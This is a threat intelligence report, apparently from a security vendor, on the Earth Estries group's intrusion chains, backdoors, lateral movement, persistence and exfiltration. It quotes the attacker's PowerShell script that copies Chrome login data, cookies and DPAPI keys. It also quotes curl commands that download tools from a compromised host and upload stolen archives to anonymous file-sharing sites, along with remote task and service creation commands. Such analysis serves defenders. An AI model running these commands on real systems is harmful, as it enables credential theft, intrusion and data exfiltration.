Crowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the behaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar to the ones seen in the older variant, with the difference being the injected process (msiexec.exe) and Command IDs (shown in table 2)

^{Table 1. List of arguments and their corresponding actions}

^{Table 2. Comparison between old and new Crowdoor variants}

^{Table 3. Crowdoor packages}

Lateral Movement

Earth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB files containing the backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.

Typically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in some instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied and executed to perform the extraction, installation, and execution of the malware. Large scale collection may also be executed using batch files.

In later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation and execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file to act as an indirect persistence mechanism for the actual backdoors.

Discovery, collection and exfiltration

TrillClient’s user credential discovery

Earth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the TrillClient information stealer for this routine, primarily collecting user credentials from browser user profiles. TrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:

foreach($win_user_path in $users_path){

echo D | xcopy “C:Users$win_user_pathAppDataRoamingMicrosoftProtect” “$copy_dest_path$win_user_pathProtect” /E /C /H;

attrib -a -s -r -h “$copy_dest_path$win_user_path*” /S /D;

echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataLocal State” “$copy_dest_path$win_user_pathLocal State” /C;

echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataDefaultNetworkCookies” “$copy_dest_path$win_user_pathDefaultNetworkCookies” /C

echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataDefaultLogin Data” “$copy_dest_path$win_user_pathDefaultLogin Data” /C;

$profile_path = Get-ChildItem -Name “C:Users$win_user_pathAppDataLocalGoogleChromeUser Data” -Include *Profile* -ErrorAction SilentlyContinue;

foreach($chrome_user_path in $profile_path){

echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser Data$chrome_user_pathNetworkCookies” “$copy_dest_path$win_user_path$chrome_user_pathNetworkCookies” /C;

echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser Data$chrome_user_pathLogin Data” “$copy_dest_path$win_user_path$chrome_user_pathLogin Data” /C;

   }
}

Data will be collected from the following folders:

• %LOCALAPPDATA%GoogleChromeUser DataLocal State
• %LOCALAPPDATA%GoogleChromeUser Data<PROFILE>Login Data
• %LOCALAPPDATA%GoogleChromeUser Data<PROFILE>NetworkCookies
• %APPDATA%MicrosoftProtect*

The collected data will be temporarily copied to <%TEMP%browser_temp_data<RANDOM>>, archived using the tar command, and encrypted with an XOR algorithm.

tar -cvf “$copy_dest_pathtar” $copy_dest_path;

$e_a = [System.IO.File]::ReadAllBytes(“$copy_dest_pathtar”);Remove-Item -Path $copy_dest_path -Recurse;

$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 – ($e_i % 199)));$e_i += 1;

$random_filename = “300775736611547784207972935122149919289871693”;

$out_put_file = $out_put_path + “” + $random_filename;

echo $out_put_file;

[System.IO.File]::WriteAllBytes($out_put_file, $e_a);

The collected data will then be sent to the threat actor’s Gmail account over Simple Mail Transfer Protocol (SMTP).

Collection of sensitive documents

Earth Estries utilizes RAR for collecting information of interest. On this attack scenario, they utilize wget to download target documents from an internal web-based document management platform to a collection folder before archiving them.

• In this instance, a batch file containing commands to download PDF files to the collection directory is executed, containing hardcoded document names:
  • c:userspublicmusictempwget.exe -c “hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf” -P c:userspublicmusictemp
• Afterwards, collected PDF’s are archived
  • C:Windowssystem32cmd.exe /C C:UsersPublicMusicrar.exe a -m5 C:UsersPublicMusicpdf0412.rar C:UsersPublicMusictemp*.pdf

Collection via backdoor

Earth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information of interest both from both local and remote locations. Some examples of collection commands performed are as follows:

^{Table 4. Collection commands}

Telemetry suggests that they were exfiltrated through the same methods that the collection command is executed: either through the command-and-control (C&C) channels of their backdoors, or through the same initial access method used to control these tools.

The second infection chain

An overview of the second Earth Estries attack flow is shown in figure 3:

The most common persistence mechanism used by Earth Estries is done via scheduled tasks. These are achieved in several ways, including the use of WMIC, allowing the remote creation of scheduled tasks:

wmic /node:<IP> /user:<domain><user> /password:***** process call create “schtasks /run /tn microsoftsihost”

The routine also uses cURL to download additional components to remote machines.

Table 5. Downloading tools via cURL commands

Network Discovery via PortScan

Network discovery and mapping are done by the backdoors directly via command line execution. Occasionally, Portscan would also be employed for this purpose. The first set of commands download PortScan then scan the network for the specified open ports (80, 443, 445, and 3389):

• cmd.exe /c “curl -k -o C:programdataportscan.exe hxxp://mail.ocac.org.pk/Portscan.docx”
• cmd.exe /c “C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443”
• cmd.exe /c “C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log”
• cmd.exe /c “cmd /c “C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443″ >>1.log”

Lateral installation of Zingdoor

After the port scanning step, a set of Zingdoor malware is downloaded. This is then copied to a separate machine that was discovered during the port scanning.

• cmd.exe /c “curl -k -o C:programdataSetupPlatform.exe hxxp://mail.ocac.org.pk/SetupPlatform.docx”
• cmd.exe /c “curl -k -o C:programdataUNBCL.dll hxxp://mail.ocac.org.pk/UNBCL.docx”
• cmd.exe /c “copy C:programdataSetupPlatform.exe 172.xx.xx.xxc$ProgramDataMicrosoftWindows”
• cmd.exe /c “copy C:programdataSetupPlatform.exe 172.xx.xx.xxc$ProgramDataMicrosoftWindows”

Remote service creation

Through ChinaChopper, Earth Estries can place commands to remotely create services for persistence and privilege escalation.

• “cmd” /c cd /d “c:WindowsIMEIMEJP”&net use {hostname} {password} /user:{user name}&echo [S]&cd&echo [E]
• “cmd” /c cd /d “c:WindowsIMEIMEJP”&copy v*.* {hostname} c$programdatavmware&echo [S]&cd&echo [E]
• sc {hostname} create VGAuthtools type= own start= auto binpath= “c:windowsmicrosoft.netFrameworkv4.0.30319Installutil.exe C:ProgramdataVMwarevmvssrv.exe”

From the configuration of the created service, the malicious loader, vmvssrv.exe (a malicious loader written in .NET assembly) is launched by using Intallutil.exe, which is a built-in installation utility in Windows system. The vmvssrv.exe loader will then load and launch Cobalt Strike to compromise the target machine.

Remote scheduled task

Again using ChinaChopper,the  threat actor can input commands to remotely create scheduled tasks for persistence.

• schtasks /create /tn VMwarevmtools /tr “cmd /c “start C:ProgramdataVMwarevmtools.exe”” /sc onstart /ru “” /S 10.131.xx.xx /U {user name} /P {password} &echo [S]&cd&echo [E]

The installed vmtool.exe file, which is deployed via the web shell, is a malicious loader used to load Cobalt Strike.

Execution: alternate loading methods

Earth Estries employs various loading methods for its tools, particularly Cobalt Strike. Aside from DLL sideloading, other loader components were designed to be used via the following methods.

Executable loaders

Cobalt Strike loaders use straightforward executable loaders such as vmtools.exe, a loading mechanism that will load an encrypted payload named msvsct.obj. This type of loader uses single byte multi-layer ADD – XOR – SUB bitwise operation to decrypt their payloads.

This type of installation also comes with a Windows Service for persistence and execution:

sc create pasrv binpath= “cmd /c “start msiexec.exe /y C:WindowsPLAPerformance.dll”” start= auto displayname= “Microsoft Performance Alerts Server”

Credential Dumping

Re-implemented NinjaCopy

NinjaCopy is a hack tool that is well known for its ability to copy protected system files. Using the tool, threat actors can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This allows them to bypass the following protections (note that a Win32 API was not used, so Windows is not aware that these protections were being ignored):

1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives.
2. System Access Control List (SACL) flag set on a file that alerts when the file is opened. (
3. Bypass the Discretionary Access Control Lists (DACLs), such as those that only allows SYSTEM to open a file.

During the operation, we notice that Earth Estries implemented a new variant of NinjaCopy by using an open-source NTFS parser released by Velocidex. With this variant, the attacker successfully extracted the SYSTEM registry hives which contain sensitive data from the victim’s environment.

Collection and exfiltration

Information collection is done via RAR archives which are mostly password-protected. The following are the RAR commands used by Earth Estries over the course of one of its campaigns:

rar a -m3 -inul -ed -r -s –hp{password} -ta{yyyymmdd} -n*.pdf -n*.ddf -x*”{avoided path}” {Collector Path}out<n>.tmp {IP}“{Target Path}“

Meanwhile, the following are the passwords that they used:

• takehaya
• foreverthegod
• dh2uiwqji9dash

Exfiltration is done using cURL, which sendis the stolen documents to anonymized file sharing services:

curl -F “file=@c:windowsimeout1.tmp” hxxps://api.anonfiles[.]com/upload
curl -F “file=@c:windowsimeout1.tmp” -k hxxps:/file[.]io
curl -F “file=@c:windowsimeout3.tmp” hxxps://api.anonfiles[.]com/upload

Command-and-Control

Hiding backdoor traffic via internal proxy server

We notice one of the C&C addresses used for Zingdoor is an internal IP address. After further investigation, we found that the internal address refers to the internal proxy server in the victim’s environment. We infer that the threat actor attempted to use the victim’s proxy server to forward traffic to the actual C&C servers, making the traffic from the backdoor more difficult to discover.

Additional observations

During the investigation, we found are other backdoors, including an Internet Information Services (IIS) backdoor (FuxosDoor) and a customized backdoor (Cryptmerlin).

We are not certain if these backdoors were indeed deployed by Earth Estries. However, the approximate occurrence time is close, and they were found within the same infected machine. Hence, we still include these findings in this report.

FuxosDoor

FuxosDoor is an IIS backdoor which was deployed and ran on the compromised exchange server. Once it receives a request with a specific URL path, /web.config from the attacker, it will try to extract the encrypted command from the field (ASP.NET_SessionId) in the HTTP header and then execute the received command by using the command prompt (cmd.exe). After, the results will be encrypted and sent back to the attacker’s server.

Cryptmerlin

Attackers used the DLL sideloading technique on the target machine to launch Cryptmerlin, a customized backdoor based on an open-source malware, Merlin Agent, written in Golang. Unlike the original Merlin Agent, Cryptmerlin currently only implements the ExecuteCommand function, which will communicate to the C&C server via HTTP/HTTPS request. To lower the security warning on the infected machine, Cryptmerlin can also communicate with the C&C server over proxy server, with the information of the victim’s internal proxy also embedded in the config.

^{Table 4. Files used for the Crypmerlin backdoor}

Conclusion

Our analysis of Earth Estries’ persistent TTPs in prolonged cyber operations reveals a sophisticated and adaptable threat actor that employs various tools and backdoors, demonstrating not only technical capabilities, but also a strategic approach to maintaining access and control within compromised environments.

In the first infection chain, Earth Estries exploited vulnerabilities in web-based adapter management tools like QConvergeConsole, employing tools like Cobalt Strike, Hemigate, and Crowdoor that are delivered via CAB file packages. Along with PsExec, these backdoors also facilitated lateral movement throughout the network. The incorporation of Trillclient for credential harvesting from browser caches further illustrates the group’s comprehensive tactics aimed at deepening their foothold in the target environment.

In the second infection chain, Earth Estries capitalized on vulnerable Exchange servers, making use of web shells, such as ChinaChopper and additional backdoors such as Zingdoor, SnappyBee, and Cobalt Strike, all of which highlights the diversity of Earth Estries’ toolkit. The deployment of these tools via C&C channels, alongside the use of techniques like DLL sideloading and cURL for downloading components, underscores their ability to adapt in response to defensive measures.

Throughout their campaigns, Earth Estries has displayed a keen understanding of their target environments, by continually identifying exposed layers for re-entry. By using a combination of established tools and custom backdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.

Recommendations

Defensive efforts should focus on securing external-facing services, especially email servers and web applications, patching known vulnerabilities, and implementing robust credential management practices. The continued evolution of new tools and tactics used by groups such as Earth Estries reinforces the necessity for constant vigilance and for implementing a multilayered defense to protect critical infrastructure from such sophisticated intrusion sets.

Finally, using technologies such as Trend Vision One™ enables security teams and analysts to view all components of the organization from a single platform. It allows them to monitor and track tools, behaviors, and payloads as they attempt to move and execute within the organization’s networks, systems, and infrastructure. At the same time, it detects and blocks threats as early in the attack or infection process as possible.